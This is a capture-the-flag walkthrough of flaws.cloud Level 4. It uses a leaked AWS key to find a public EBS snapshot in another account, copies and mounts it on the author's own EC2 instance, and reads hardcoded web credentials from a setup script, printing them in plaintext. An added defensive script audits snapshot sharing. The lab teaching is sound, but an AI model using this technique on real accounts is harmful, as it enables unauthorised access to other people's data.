# Level 4

For Level 4, we are told that we need to access a web page running on an EC2 instance.

<figure><img src="https://450836410-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fgns9cN7UvH1POIBCfrRn%2Fuploads%2FS3ryz9A2cWOYfcnuGxz8%2Fimage.png?alt=media&#x26;token=cc967e29-e6c8-4948-9b25-0ed779f61a2e" alt=""><figcaption></figcaption></figure>

<https://docs.aws.amazon.com/cli/latest/reference/ec2/>

First, we need the account ID, which we can get using the AWS key from Level 3. Using the `get-caller-identity` command also tells you the name of the account. In this case, the name is "backup".

```
aws sts get-caller-identity --profile flaws3
```

<figure><img src="https://450836410-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fgns9cN7UvH1POIBCfrRn%2Fuploads%2F6b6xxwzyx8ByivZefs7U%2Fimage.png?alt=media&#x26;token=2c485b63-4d18-45a6-81ab-2758b7946601" alt=""><figcaption></figcaption></figure>

Run the `host` command to find that the site is hosted in `us-west-2`.

```
host 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud
```

<figure><img src="https://450836410-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fgns9cN7UvH1POIBCfrRn%2Fuploads%2FGPLRYtdyNpLSJBZO8m2r%2Fimage.png?alt=media&#x26;token=5ac3ef4e-5b86-4d2e-8e85-a5578764582e" alt=""><figcaption></figcaption></figure>

Another way of doing this is with `nslookup`:

```
nslookup 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud
```

<figure><img src="https://450836410-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fgns9cN7UvH1POIBCfrRn%2Fuploads%2FRehtr6MPJYlow03jk8ub%2Fimage.png?alt=media&#x26;token=8cdb71d8-7c85-4a8f-bcbf-fab93c1f323b" alt=""><figcaption></figcaption></figure>

We determined that this account is named "backup". To see if there are any snapshots associated with the account, run the command below.

```
aws ec2 describe-snapshots --profile flaws3
```

<figure><img src="https://450836410-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fgns9cN7UvH1POIBCfrRn%2Fuploads%2Fnp3eGRnCjTAeGv9pqtEU%2Fimage.png?alt=media&#x26;token=b56f0aa6-db81-421a-90e3-8d304619983c" alt=""><figcaption></figcaption></figure>

Since we have found a list of snapshots, let's try to drill down.

```
aws --profile flaws3 ec2 describe-snapshots --owner-id 975426262029
```

If we run this command, we do not have access since we are not in the correct AZ.

<figure><img src="https://450836410-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fgns9cN7UvH1POIBCfrRn%2Fuploads%2F9GZIpIR3tUIhcirRweyX%2Fimage.png?alt=media&#x26;token=00d0aa4c-6648-4949-af91-6b0141b5d102" alt=""><figcaption></figcaption></figure>

To change the region, we need to reconfigure the profile:

`aws configure --profile flaws3` and change the region name to us-west-2

Run the command again. This time it returns with the snapshot.

<figure><img src="https://450836410-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fgns9cN7UvH1POIBCfrRn%2Fuploads%2F7wxGUAWYBd1P4KW3m7AZ%2Fimage.png?alt=media&#x26;token=975459b7-895f-431b-9bd5-b55cd663dbcf" alt=""><figcaption></figcaption></figure>

Use the command below to check the permissions of the volume.

```
aws ec2 describe-snapshot-attribute --snapshot-id snap-0b49342abd1bdcb89 --attribute createVolumePermission --profile flaws3
```
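Seen from the defender's side, this is the attribute to audit on snapshots you own: a `createVolumePermission` entry of `"Group": "all"` means any AWS account can create a volume from the snapshot. The script below is an added example, not part of the original walkthrough; the function names are hypothetical and the sample JSON documents are constructed with placeholder IDs.

```sh
#!/bin/sh
# Added example: classify createVolumePermission on a snapshot (defensive audit).

# Read one `aws ec2 describe-snapshot-attribute` JSON document on stdin.
# Prints: public | shared:<account-ids> | private
snapshot_exposure() {
    json=$(tr -d ' \t\r\n')   # compact so the patterns match any layout
    case $json in
        *'"Group":"all"'*) echo "public"; return 0 ;;
    esac
    ids=$(printf '%s' "$json" | grep -o '"UserId":"[0-9]*"' \
          | tr -cd '0-9\n' | paste -sd, - || true)
    if [ -n "$ids" ]; then echo "shared:$ids"; else echo "private"; fi
}

# Print (do not run) the command that removes public access from a snapshot.
remediation_cmd() {
    printf 'aws ec2 modify-snapshot-attribute --snapshot-id %s ' "$1"
    printf '%s\n' '--attribute createVolumePermission --operation-type remove --group-names all'
}

# Live use against your own account (needs AWS CLI credentials; not called here).
audit_own_snapshots() {
    region=$1
    for id in $(aws ec2 describe-snapshots --owner-ids self --region "$region" \
                --query 'Snapshots[].SnapshotId' --output text); do
        result=$(aws ec2 describe-snapshot-attribute --snapshot-id "$id" \
                 --region "$region" --attribute createVolumePermission \
                 --output json | snapshot_exposure)
        echo "$id $result"
        if [ "$result" = "public" ]; then remediation_cmd "$id"; fi
    done
}

# Constructed sample responses; snapshot and account IDs are placeholders.
SAMPLE_PUBLIC='{
    "SnapshotId": "snap-EXAMPLE-public",
    "CreateVolumePermissions": [ { "Group": "all" } ]
}'
SAMPLE_SHARED='{"SnapshotId":"snap-EXAMPLE-shared","CreateVolumePermissions":[{"UserId":"111122223333"},{"UserId":"444455556666"}]}'
SAMPLE_PRIVATE='{"SnapshotId":"snap-EXAMPLE-private","CreateVolumePermissions":[]}'

for sample in "$SAMPLE_PUBLIC" "$SAMPLE_SHARED" "$SAMPLE_PRIVATE"; do
    printf '%s\n' "$sample" | snapshot_exposure
done
```

Run `audit_own_snapshots us-west-2` with your own profile to list each snapshot's exposure and print a remediation command for any that are public.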

Within your AWS account, create the volume using the snapshot.

*Note: I am using the profile (flaws) that I created in the previous levels that is tied to my AWS account.*

```
aws --profile flaws ec2 create-volume --availability-zone us-west-2c --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
```

<figure><img src="https://450836410-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fgns9cN7UvH1POIBCfrRn%2Fuploads%2FLuXymg7a1fTomYBWniOT%2Fimage.png?alt=media&#x26;token=20b27828-0a5e-44b6-ba4e-5fd769d748c5" alt=""><figcaption></figcaption></figure>

Ensure that the volume is created by running the following command.

```
aws --profile flaws ec2 describe-volumes --region us-west-2
```

<figure><img src="https://450836410-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fgns9cN7UvH1POIBCfrRn%2Fuploads%2FhKmrZwaGS2euYgFUY5ht%2Fimage.png?alt=media&#x26;token=fd14efd2-c17e-4622-8421-52283661549e" alt=""><figcaption></figcaption></figure>

Within the console, we can see that the volume was created.

<figure><img src="https://450836410-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fgns9cN7UvH1POIBCfrRn%2Fuploads%2FKk4rPrdrmXZM6saDdgQ6%2Fimage.png?alt=media&#x26;token=50c05307-6281-4a24-a030-e612af298ab1" alt=""><figcaption></figcaption></figure>

An EC2 instance will need to be created so that we can mount the snapshot. Be sure to generate a key pair. For this instance, I used Ubuntu.

<figure><img src="https://450836410-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fgns9cN7UvH1POIBCfrRn%2Fuploads%2FsTTqPEue4IkWaANyWhr5%2Fimage.png?alt=media&#x26;token=024d77ea-4845-4f7d-927c-a3bd3c1b2445" alt=""><figcaption></figcaption></figure>

Once the EC2 key is downloaded, I moved the .pem file to my Desktop.

```
mv ~/Downloads/flaws_lab.pem ~/Desktop
```

<div align="left"><figure><img src="https://450836410-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fgns9cN7UvH1POIBCfrRn%2Fuploads%2FYq0SoAdLgS1PNvZZ4kQA%2Fimage.png?alt=media&#x26;token=bf14e872-1408-4a7a-ba76-6b468cc052eb" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="https://450836410-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fgns9cN7UvH1POIBCfrRn%2Fuploads%2FMGHgTIOiPQLHIkYPoMlo%2Fimage.png?alt=media&#x26;token=2076bc2a-7a62-463e-a88e-8116e5e5e55f" alt=""><figcaption></figcaption></figure></div>

We’ll change the permissions on the file.

```
chmod 400 flaws_lab.pem
```

<div align="left"><figure><img src="https://450836410-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fgns9cN7UvH1POIBCfrRn%2Fuploads%2FcLCYswNeuL6b8vHn8rOY%2Fimage.png?alt=media&#x26;token=c4f4a1bf-8001-4fad-9b4c-7ba50bf5385f" alt=""><figcaption></figcaption></figure></div>

Once the EC2 is up and running, go to the snapshot and attach it to the new EC2 instance.

<figure><img src="https://450836410-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fgns9cN7UvH1POIBCfrRn%2Fuploads%2FoPlLSUqur5aqMDVfCMEF%2Fimage.png?alt=media&#x26;token=31d51bef-5171-42e9-a0c7-1c48ed9067ff" alt=""><figcaption></figcaption></figure>

Confirm that it is attached.

<figure><img src="https://450836410-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fgns9cN7UvH1POIBCfrRn%2Fuploads%2FTPblNa04xFgAY1tFHwnm%2Fimage.png?alt=media&#x26;token=de30ab4e-004f-46c1-828f-5f8eb24506bf" alt=""><figcaption></figcaption></figure>

Let’s SSH into the EC2 instance. You can find instructions [here](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/connect-linux-inst-ssh.html).

ssh follows this structure: `ssh -i /path/key-pair-name.pem instance-user-name@instance-public-dns-name`

```
ssh -i flaws_lab.pem <instance-user-name@instance-public-dns-name>
```

<figure><img src="https://450836410-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fgns9cN7UvH1POIBCfrRn%2Fuploads%2FsCKBXfBfxKO27qvsU2pA%2Fimage.png?alt=media&#x26;token=0aa88f21-40c8-4ec3-860d-8ac001f637d2" alt=""><figcaption></figcaption></figure>

Once in the instance, let’s list the drives. We will be mounting "xvdf1".

```
lsblk
```

<figure><img src="https://450836410-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fgns9cN7UvH1POIBCfrRn%2Fuploads%2F2IijmOaUBPV0MEnWh5qD%2Fimage.png?alt=media&#x26;token=6e4837d1-61c8-4a3d-a2d2-4a40f52d607c" alt=""><figcaption></figcaption></figure>

Create a new directory for this drive.

```
sudo mkdir /mnt/flaws
```

<div align="left"><figure><img src="https://450836410-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fgns9cN7UvH1POIBCfrRn%2Fuploads%2FfGHGiBxiQo8JvZUF0Sop%2Fimage.png?alt=media&#x26;token=d72b5ff7-7e67-4cb1-ada7-e85023f92b1b" alt=""><figcaption></figcaption></figure></div>

Mount the drive.

```
sudo mount /dev/xvdf1 /mnt/flaws
mount
```

<figure><img src="https://450836410-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fgns9cN7UvH1POIBCfrRn%2Fuploads%2FrO8rmp2wmHPnxXIiMkPG%2Fimage.png?alt=media&#x26;token=f6a782df-f4b3-4a30-87bb-124c880032bf" alt=""><figcaption></figcaption></figure>

Navigate to the directory and list the contents. We’ll check out the home folder to see what users are on the volume. It looks like Ubuntu is the only user. If we go into the Ubuntu directory, we can see two files. `setupNginx.sh` stands out since it is a bash script. Let’s read it using the `cat` command to see what we can find. It looks like there are hardcoded credentials.

<figure><img src="https://450836410-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fgns9cN7UvH1POIBCfrRn%2Fuploads%2Fd5K1D0KrXFiupbQ2qqD9%2Fimage.png?alt=media&#x26;token=88529da3-bcd1-44cb-bbd1-ead5c69d6e26" alt=""><figcaption></figcaption></figure>

By using the credentials we just found (flaws:nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M), we successfully logged into the web portal.

<figure><img src="https://450836410-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fgns9cN7UvH1POIBCfrRn%2Fuploads%2FlkwgNaXzVOFnge9qD7O6%2Fimage.png?alt=media&#x26;token=20386330-e2fd-421e-b44b-d4daba2b981b" alt=""><figcaption></figcaption></figure>
